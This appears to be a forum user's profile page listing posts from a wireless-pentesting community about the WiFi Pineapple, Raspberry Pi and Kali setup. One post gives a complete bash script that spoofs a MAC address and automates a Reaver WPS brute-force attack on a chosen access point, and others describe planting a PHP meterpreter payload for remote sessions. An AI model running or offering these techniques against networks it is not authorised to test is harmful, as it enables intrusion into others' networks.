Jump to content

Battery_

Active Members
  • Posts

    16
  • Joined

  • Last visited

Recent Profile Visitors

1,426 profile views

Battery_'s Achievements

Newbie

Newbie (1/14)

  1. I'm trying to mess around with this as well. None of the forum posts referenced really have any info on this infusion, also the github seems to be offline and an old link... WM can you give us some info and a basic run down of the operation of this thing? Thanks
  2. So this may be a dumb question but I'm curious how people are using these two devices together. What tasks are you putting off on the Rasberry Pi? Are you jaming with the Rasberry pi, using it as a web server for the pineapple? Just curious as I just received my rasberry pi and I'm looking to see what techniques others have used successfully. Thanks
  3. Skysploit thanks for the quick response. I just reinstalled Kali and all of the sudden pure-ftpd was showing up in the repositories again. For some reason before I would apt-get update, then try to install it and it wouldn't find the package...
  4. I'm having issues with Pure-FTPD not being installed, or installed correctly. The setup script didn't have it working and the repositories can't find it in Kali. I downloaded and installed it from a tar.gz file but simple-ducky still can't work with it. Has anyone run into this issue before?
  5. I'm just learning how to Bash Script so I decided to make a nice and easy Reaver for idiots script. Let me know what you guys think or if anything else should be added, or any suggestions on the code. Just using this as a launch off point to learn stuff and eventually hopefully a full module for the pineapple. Just save the below to a file and execute #!/bin/bash clear echo "This script makes it easy to start a reaver attack" echo "" echo "[+] Do you need to setup a monitor interface? [y/n]" read setup if [[ $setup == 'y' ]]; then #Setup the monitor interface echo "[+] What Wireless interfaces do we have..." iwconfig echo "[+] Please select an interface to place into Monitor Mode [wlan0]" read interface if [[ $interface == '' ]]; then interface=wlan0 #Default to wlan0 fi echo "[+] Starting monitor Mode for $interface" airmon-ng start $interface iwconfig fi #End Mon Mode Setup Portion #Start part of script that executes regardless echo "[+] What monitor interface should I use? [mon0]" read monInterface if [[ $monInterface == '' ]]; then monInterface=mon0 #Default to mon0 fi #Spoof the Mon Mac echo "[+] MacSpoofing $monInterface" ifconfig $monInterface down macchanger -r $monInterface ifconfig $monInterface up #Check for Targets echo "" echo "[+] ------------------------------------------------------[+]" echo "[+] Checking for WPS enabled APs press (ctrl+c) when done [+]" echo "[+] ------------------------------------------------------[+]" wash -i $monInterface #Set Reaver Target echo "[+] What is the MAC for the target AP?" read target #Set optional functions reaver #to show the options available in terminal echo "[+] reaver -i $monInterface -b $target" echo "[+] Type any other reaver options you'd like besides the above" read reaverVars #Start REAVERINGGGGG!!!! echo "[+] Starting reaver (reaver -i $monInterface -b $target $reaverVars)" reaver -i $monInterface -b $target $reaverVars #Stop Monitor Mode Interface if the script set it up if [[ $setup == 'y' ]]; then echo "" echo "[+] killing Monitor Interface" airmon-ng stop $monInterface fi [/CODE]
  6. Another reaver method that has worked for me in the past with the timeout issue is to make it increase the time before retrying. 7 seconds has seemed to work really well, obviously taking longer to crack though....
  7. If you have metasploit installed you can generate the meterpreter php payload (msfpayload) and kind of get it done yourself. I didn't really have any luck being able to keep it active, Darren has a script on here if you search meterpreter that should keep it alive. I'd search google for php meterpreter payload and you should find some walkthroughs
  8. So I got this working sort of... I just uploaded the meterpreter.php exploit into the www directory and named it m.php So when I browse to m.php I get my evil looking linux icon in Armitage and get my meterpreter session. However whenever I try to make a pivot or anything I get "loading scdapi. Try command again later" Anyone else have that issue?
  9. There is a network manager module that works pretty well for doing this type of stuff too. I used it to get wlan to correctly work.
  10. I know this has nothing to do with encryption but you could use the whitelist feature and input only the MAC's you want to be a client on the pineapple.
  11. Seb - Is this going to appear in new firmware? Or is this something that you made for yourself?
  12. [edit] Posted issue in wrong thread...my bad
×
×
  • Create New...